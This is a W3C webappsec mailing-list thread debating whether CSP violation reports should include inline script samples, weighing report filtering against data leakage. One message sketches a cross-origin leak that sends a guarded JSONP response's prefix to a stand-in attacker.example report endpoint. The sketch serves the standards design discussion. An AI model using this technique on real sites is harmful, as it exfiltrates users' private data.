Re: CSP reports: `script-sample`

I'd suggest that interested folks comment on
https://github.com/w3c/webappsec-csp/issues/119. I've added a strawman to
the spec which allows a policy to opt-in to delivering a `sample` attribute
for inline violations iff a `'report-sample'` expression is present in the
relevant `script-src` or `style-src` directive.
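
For example, a policy opting in might look like this (a sketch of the
strawman syntax; the nonce and report endpoint are placeholders):

    Content-Security-Policy-Report-Only:
        script-src 'nonce-abc123' 'report-sample';
        report-uri /csp-endpoint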

Feedback welcome.

-mike

On Tue, Feb 21, 2017 at 8:39 PM, Neil Matatall <oreoshake@github.com> wrote:

> :wave: hello again friends,
>
> I've been snoozing this thread for almost 6 months and I'd like to
> resurrect this conversation after a recent twitter flurry of action and +1s
> (https://twitter.com/mikewest/status/834081437473185792). I don't think
> anyone has called out _why_ we need this other than "moar data" but I think
> it's important to think about two use cases: report filtering and actually
> capturing attack payloads. 5 years ago
> (https://lists.w3.org/Archives/Public/public-webappsec/2012Dec/0012.html)
> I thought script-sample was for capturing attack payloads. Today, I
> think script-sample is more important for report filtering.
>
> 2.5 years ago the topic of "inline and eval reports look the same" was
> discussed (https://github.com/w3c/webappsec/issues/52). This is a serious
> problem for analyzing reports.
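>
> (To illustrate -- an inline <script> violation and an eval() violation
> both come back shaped roughly like this; the blocked-uri value varies
> by browser ("self", "", or "inline"), and nothing distinguishes the
> two cases:)
>
>     {"csp-report": {
>       "document-uri": "https://example.com/account",
>       "violated-directive": "script-src 'self'",
>       "blocked-uri": "self"
>     }}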
>
> .... slight tangent on why filtering is so important
>
> CSP reporting without script-sample is not very useful for filtering
> garbage from plugins. Having script-sample data from Firefox has been
> the basis of that filtering; without it, we cannot filter out this
> specific type of garbage. Filtering out garbage is critical for
> building the case for going from report-only to enforce mode. This
> logic is spread out across the internet, e.g.
> https://oreoshake.github.io/csp/twitter/2014/07/25/twitters-csp-report-collector-design.html,
> https://blogs.dropbox.com/tech/2015/09/on-csp-reporting-and-filtering/,
> etc. Funnily enough, superfish.com was a standard "un-actionable
> report" filter that has been passed down :) For every blog post on CSP
> reporting, the conversation always devolves to one thing: how are you
> filtering reports (https://mathiasbynens.be/notes/csp-reports). For
> every CSP reporting collector, filtering is reimplemented
> (https://github.com/jacobbednarz/go-csp-collector/blob/master/csp_collector.go#L58
> and
> https://github.com/nico3333fr/CSP-useful/blob/61106b31683928a0f3dde3d312eaa257d0740914/report-uri/csp-parser-enhanced.php#L17).
> Sentry even added CSP report collection, and guess what, they also do
> filtering:
> https://github.com/getsentry/sentry/commit/0b9e124b702183a70002635ffd252e27d11fbe97.
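>
> (A minimal sketch of the kind of filter every collector ends up
> writing -- the noise prefixes here are hypothetical:)
>
>     // Drop reports whose sample matches known extension/plugin noise.
>     const KNOWN_NOISE_PREFIXES = [
>       'var BlockAdBlock',        // hypothetical ad-blocker probe
>       'try{(function(){var lp',  // hypothetical extension injection
>     ];
>
>     function isActionable(report) {
>       const sample = report['script-sample'] || '';
>       return !KNOWN_NOISE_PREFIXES.some(p => sample.startsWith(p));
>     }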
>
> Scott Helme says he filters out 64% of his reports (though this number
> includes things that are not CSP reports). That's about what I recall
> from my days collecting reports. With script-sample from all browsers,
> I suspect that number will jump significantly, since it will be easier
> to identify plugins and other garbage.
>
> ... my point is
>
> Most people implementing CSP expect the reports to be useful. Alas,
> they are not without some serious filtering, and many are turned away
> by the high quantity of "un-actionable" reports. While I'd be super
> happy if browser vendors came up with magic to make filtering obsolete
> (all have acknowledged that plugin noise is a bug), I'd be happier if
> we could just do better filtering today. Script samples help me
> accomplish better filtering.
>
> ... but
>
> Data leakage. This is not to be taken lightly, but I think everything
> that can be said about it already has been. I also anecdotally agree
> that we're more likely to leak something in a URL than in a script
> sample. The script samples were crucial to filtering out LastPass
> violations, which were easily identifiable. Adding an opt-in flag while
> keeping the 40-character limit would be great. Requiring TLD+1 matching
> would also be acceptable in my mind.
>
> JSONP. Ugh. It's still pretty widespread and it's unfortunate that the
> internet is still terrible. I'm all for not breaking the web, but I'm more
> for not being held back.
>
>
> On Wed, Oct 19, 2016 at 9:49 AM Artur Janc <aaj@google.com> wrote:
>
>> On Wed, Oct 19, 2016 at 7:14 PM, Brad Hill <hillbrad@gmail.com> wrote:
>>
>> Just to add my comment after discussion on today's teleconference:
>>
>> I'm sympathetic to the argument that "you must trust your reporting
>> endpoint" for inline scripts and event handlers.
>>
>> I'm concerned about it for non-same-origin external scripts. There are
>> lots of "guarded" JSONP-like endpoints that I imagine have PII in the
>> first 40 chars, e.g., something like the following, where u is a userid:
>>
>> for(;;);{u:21482823,  ...
>>
>> Allowing any cross-origin endpoint to request this response and dump it
>> to a reporting endpoint of their choice would be very bad.
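>>
>> Spelling out the attack, assuming samples were sent for external
>> scripts: a hostile page could serve itself a report-only policy and
>> harvest the prefix of any credentialed cross-origin response
>> (attacker.example and the paths below are hypothetical):
>>
>>     Content-Security-Policy-Report-Only:
>>         script-src 'none'; report-uri https://attacker.example/collect
>>
>>     <script src="https://victim.example/guarded-feed"></script>
>>
>> The report for the would-be-blocked script would then carry the first
>> N characters of the guarded JSONP body.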
>>
>>
>> Yes, totally! What we were talking about earlier is reporting script
>> samples for "inline" script violations such as event handlers and inline
>> <script> blocks -- this is data which the developer can already access by
>> inspecting the DOM (though in some cases it can be difficult if the element
>> has already been removed). The main benefit of having it done by the user
>> agent is robustness and not requiring the developer to load a "CSP
>> debugging" library everywhere on their site.
>>
>> FWIW I'd be strongly opposed to doing this for external scripts because
>> of the problem you're talking about. Luckily, we generally don't need this
>> for external scripts because they can already be identified by the
>> blocked-uri, unlike inline violations.
>>
>>
>> -Brad
>>
>> On Wed, Oct 19, 2016 at 8:21 AM Craig Francis <craig.francis@gmail.com>
>> wrote:
>>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties
>>
>>
>>
>> Hi Krzysztof,
>>
>> While I agree, the classic example is a password reset.
>>
>> As in, a link is sent to the user via email, and that link contains a
>> sensitive token that allows someone to change the account password.
>>
>> That said, the token should be short-lived to reduce the risk of it
>> being exposed to 3rd parties (e.g. by expiring it after use, or after a
>> certain period of time).
>>
>> Craig
>>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>>
>>
>> 2016-10-19 2:16 GMT+02:00 Artur Janc <aaj@google.com>:
>>
>> On Tue, Oct 18, 2016 at 10:05 AM, Mike West <mkwst@google.com> wrote:
>>
>> On Tue, Oct 18, 2016 at 1:03 AM, Artur Janc <aaj@google.com> wrote:
>>
>> On Mon, Oct 17, 2016 at 7:15 PM, Devdatta Akhawe <dev.akhawe@gmail.com>
>> wrote:
>>
>> Hey
>>
>> In the case of a third-party script having an error, what are example
>> leaks you are worried about?
>>
>>
>> The same kinds of issues that lead us to sanitize script errors for
>> things loaded as CORS cross-origin scripts:
>> https://html.spec.whatwg.org/#muted-errors. If the resource hasn't
>> opted-in to being same-origin with you, script errors leak data you
>> wouldn't otherwise have access to.
>>
>>
>> Thanks for the summary, Mike! It's a good overview of the issue, but I'd
>> like to expand on the reasoning for why including the prefix of an inline
>> script doesn't sound particularly scary to me.
>>
>>
>> Thanks for fleshing out the counterpoints, Artur!
>>
>>
>> Basically, in order for this to be a concern, all of the following
>> conditions need to be met:
>>
>> 1. The application has to use untrusted report collection infrastructure.
>> If that is the case, the application is already leaking sensitive data from
>> page/referrer URLs to its collector.
>>
>>
>> "trusted" to receive URLs doesn't seem to directly equate to "trusted" to
>> store sensitive data. If you're sure that you don't have sensitive data on
>> your pages, great. But you were also presumably "sure" that you didn't have
>> inline script on your pages, right? :)
>>
>>
>> Keep in mind that URLs are sensitive data for most applications and they
>> are currently being sent in violation reports.
>>
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties in e.g. the referrer. If they do, that's usually
>> considered a vulnerability by e.g. OWASP, especially if the URL is
>> capability-bearing (IDOR
>> <https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References>
>> is even in the OWASP Top 10). I agree that some applications disclose
>> sensitive information in URLs, but that should not be the majority of
>> them. I think that for a lot of applications, URLs reported through e.g.
>> CSP violation reports are still subject to regular access control,
>> whereas we simply don't know yet whether sensitive tokens end up in
>> script samples. It's likely some IDs are present in inline scripts, e.g.
>> <a href=# onclick=a.select(123)>
>>
>> The password reset example Craig is talking about is a fairly ubiquitous
>> feature which generally needs to pass sensitive data in the URL for
>> compatibility with email clients. Also, capability URLs are a thing in a
>> lot of apps (e.g. Google Docs), and so are various features which reveal
>> the identity of the current user (/profile/koto).
>>
>> But even without direct leaks of PII and SPII, URLs contain a lot of data
>> about the current user, the data they have in the given application, and
>> their interactions with the app. For example, a search engine is likely to
>> disclose your queries, a social network will leak the IDs of your friends
>> and groups you belong to, a mapping site will have your location, and even
>> a news site will disclose the articles you read, which are sensitive in
>> certain contexts.
>>
>> This is difficult to definitively prove, but I'd say that claiming that
>> an application doesn't have any interesting/sensitive data in its URLs
>> would be an exception rather than the norm. But I'm not sure how to
>> convince you other than letting you pick some interesting apps and trying
>> to find interesting stuff in their URLs ;-)
>>
>> Cheers,
>> -A
>>
>>
>>
>>
>> I'm having a difficult time imagining a case where an application is okay
>> with disclosing its URLs to a third party for the purpose of debugging
>> violation reports, but is not okay with disclosing script prefixes for the
>> same purpose, given that:
>> 1) Almost all applications have sensitive data in URLs, compared to the
>> certainly real, but less specific, risk of having inline scripts with
>> sensitive data in their prefixes, assuming the sample is limited to a
>> reasonable length.
>>
>>
>> Citation needed (for the "almost all" claim). I agree the risk of leaking
>> sensitive data might be mitigated by adding a reasonable length limit.
>>
>> 2) URLs are disclosed much more frequently than script samples would be,
>> because they are sent with every report (not just "inline" script-src
>> violations). In the `referrer` field, the UA is also sending a URL of
>> another, unrelated page, increasing the likelihood that sensitive data will
>> appear in the report.
>>
>>
>> Which is why it's a best practice not to have sensitive data in URLs,
>> but to use e.g. cookies or POST parameters to transfer it instead.
>>
>>
>> 3) There is no sanitization of URL parameters in violation reports,
>> compared to the prefixing logic we're considering for script samples.
>>
>>
>> In fact, I'd be much more worried about URLs than script prefixes,
>> because URLs leak on *any* violation (not just for script-src) and URLs
>> frequently contain PII or authorization/capability-bearing tokens, e.g.
>> for password reset functionality.
>>
>>
>> We've talked a bit about URL leakage in
>> https://github.com/w3c/webappsec-csp/issues/111. I recall that Emily was
>> reluctant to apply referrer policy to the page's URL vis-à-vis the
>> reporting endpoint, but I still think it might make sense.
>>
>>
>> 2. The application needs to have a script which includes sensitive user
>> data somewhere in the first N characters. FWIW in our small-scale analysis
>> of a few hundred thousand reports we saw ~300 inline script samples sent
>> by Firefox (with N=40) and haven't found sensitive tokens in any of the
>> snippets.
>>
>>
>> Yup. I'm reluctant to draw too many conclusions from that data, given the
>> pretty homogeneous character of the sites we're currently applying CSP to
>> at Google, but I agree with your characterization of the data.
>>
>> Scott might have more data from a wider sampling of sites, written by a
>> wider variety of engineering teams (though it's not clear that the terms of
>> that site would allow any analysis of the data).
>>
>>
>> I completely agree, this data is just what we had readily available -- we
>> can certainly do a much larger analysis of script prefixes based on the
>> search index. That said, if we're worried about the script-sample approach,
>> perhaps not seeing any sensitive data in the first dataset we looked at
>> could be a signal that it's worth pursuing further.
>>
>> 3. The offending script needs to cause a CSP violation, i.e. not have a
>> valid nonce, meaning that the application is likely broken if the policy is
>> in enforcing mode.
>>
>>
>> 1. Report mode exists.
>>
>> 2. Embedded enforcement might make it more likely that XSS on a site
>> could cause a policy to be inadvertently applied to itself or its
>> dependencies. We talked about this briefly last week, and I filed
>> https://github.com/w3c/webappsec-csp/issues/126 to ponder it. :)
>>
>>
>> Since CSPs applied by embedded enforcement serve a very different purpose
>> than current policies (they don't try to mitigate script injection), it
>> would very likely be okay to just not include script-sample data for such
>> policies. Also, embedded enforcement is still pretty far off, and the
>> reporting problem is an issue for pretty much every site currently
>> gathering violation reports; we should probably weigh the value of fixing
>> CSP reporting accordingly.
>>
>>
>> As a security engineer, I would consider #1 to be the real security
>> boundary -- a developer should use a CSP collector she trusts because
>> otherwise, even without script-sample, reports contain data that can
>> compromise the application.
>>
>>
>> That sounds like an argument for reducing the amount of data in reports,
>> not for increasing it. I think it's somewhat rational to believe that
>> reporting endpoints are going to have longer retention times and laxer
>> retention policies than application databases. Data leaking from the latter
>> into the former seems like a real risk. I agree that the URL itself already
>> presents risks, but I don't understand how that's a justification for
>> accepting more risk.
>>
>>
>> It is an argument for using trusted infrastructure when building your
>> application ;-) Developers are already accustomed to deciding whether to
>> place trust in various components of their apps, whether it's the hosting
>> platform and OS, server-side modules and libraries, or JS widgets and other
>> embedded resources. A CSP violation endpoint is currently a
>> security-critical part of an application because it receives URLs; people
>> who don't trust their collection infrastructure already have insecure
>> applications and adding script-sample to reports does little to change
>> this. (Note that this wouldn't hold for applications which have nothing
>> sensitive in URLs and embed sensitive data at the beginning of inline
>> scripts, but this doesn't seem like a common pattern.)
>>
>> Basically, the reluctance to include relevant debugging information in
>> the violation report seems to be somewhat of a misplaced concern to me,
>> because it ignores the trust relationship the application owner must
>> already have with their report collection endpoint.
>>
>> Perhaps it's pertinent to take a step back and think about the reason to
>> have reporting functionality in CSP in the first place -- after all, the
>> mechanism could certainly work only via throwing SecurityPolicyViolation
>> events and requiring developers to write their own logging code. The fact
>> that this capability exists in UAs, and is not restricted to sending
>> reports to the same origin or same "base domain" (contrary to the original
>> proposals, e.g. in http://research.sidstamm.com/papers/csp-www2010.pdf)
>> indicates that CSP wants to be flexible and give developers ultimate
>> control over the reporting functionality. Given this design choice, it
>> seems okay to trust the developer to pick the right report URI for their
>> application and include useful debugging data if the developer wants it; in
>> a way, the status quo is the worst of both worlds, because it already
>> requires the developer to fully trust the collector, but doesn't give her
>> enough useful data to track down causes of violations.
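>>
>> (For concreteness, the DIY alternative would look roughly like this on
>> every page; the collector path is a placeholder:)
>>
>>     document.addEventListener('securitypolicyviolation', function (e) {
>>       // Ship the fields we care about to our own collector.
>>       navigator.sendBeacon('/csp-collector', JSON.stringify({
>>         'document-uri': e.documentURI,
>>         'violated-directive': e.violatedDirective,
>>         'blocked-uri': e.blockedURI
>>       }));
>>     });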
>>
>> In case it helps: Lukas ran a quick analysis of the report-uri values
>> we've seen in the wild, and e.g. for the domains with CSP in Alexa 100,000
>> we see the following:
>> - 49% don't set a report-uri
>> - 29% have a report-uri pointing to a relative path (/foo)
>> - 10% have a report-uri pointing to the same origin, with another 1%
>> using a sibling subdomain (foo.example.org reporting to csp.example.org)
>>
>> Out of the remaining ~10% which send violations to external URLs, about
>> half point to report-uri.io and a couple of other logging services, and
>> the rest seems to use another domain owned by the same person/organization,
>> e.g. vine.co sends reports to twitter.com. The data for all domains in
>> our set isn't substantially different (66% without report-uri; 24%
>> reporting to own domain; 10% externally). This data doesn't include all the
>> Google ccTLDs and a couple of other big providers, and I'm sure it's
>> missing some other domains, e.g. ones with CSP in parts of the site
>> requiring authentication, but AFAIK it shouldn't have a systematic bias
>> otherwise.
>>
>> I can easily imagine scripts that violate conditions #2 and #3, but at
>> the same time we have not seen many examples of such scripts so far, nor
>> have people complained about the script-sample data already being included
>> by Firefox (AFAIK).
>>
>>
>> People are generally unlikely to complain about getting more data,
>> especially when the data's helpful and valuable. That can justify pretty
>> much anything, though: lots of people think CORS is pretty restrictive, for
>> instance, and probably wouldn't be sad if we relaxed it in various ways.
>>
>>
>> Overall, I don't see the gathering of script samples as qualitatively
>> different to the collection of URLs. However, if we are indeed particularly
>> worried about script snippets, we could make this opt-in and enable the
>> functionality only in the presence of a new keyword (report-uri /foo
>> 'report-script-samples') and add warnings in the spec to explain the
>> pitfalls. This way even if I'm wrong about all of the above we would not
>> expose any data from existing applications.
>>
>>
>> I suspect that such an option would simply be copy-pasted into new
>> policies, but yes, it seems like a reasonable approach.
>>
>>
>> For some background about why we're even talking about this: currently
>> violation reports are all but useless for both debugging and detection of
>> the exploitation of XSS due to the noise generated by browser extensions.
>>
>>
>> I agree that this is a problem that we should solve. One way of solving
>> it is to add data to the reports. Another is to invest more in cleaning up
>> the reports that you get so that there's less noise. I wish browser vendors
>> (including Chrome) spent more time on the latter, as we're actively harming
>> users by not doing so.
>>
>>
>> Yes, fixing the blocking and reporting of extension-injected scripts
>> would certainly help (although note that "less noise" likely isn't
>> sufficient, it really has to be zero noise), but IIRC prior discussions
>> we've had about the topic indicated that this is an almost intractable
>> problem, so it would be great to find alternative solutions.
>>
>> The script sample approach also has several important advantages because
>> even without extension-related false positives, developers would have very
>> little information about the actual cause of inline script violations
>> (which are the majority of possible CSP problems in nonce-based policies).
>> Sending some of the script text not only makes it possible to discard all
>> spurious reports, but also gives the developer the crucial bit of data to
>> find and fix actual site errors; it seems like a workable solution to the
>> current reporting problems faced by many sites.
>>
>> Cheers,
>> -Artur
>>
>> --
>> Best regards,
>> Krzysztof Kotowicz
>>
>>
>>

Received on Wednesday, 22 February 2017 14:24:31 UTC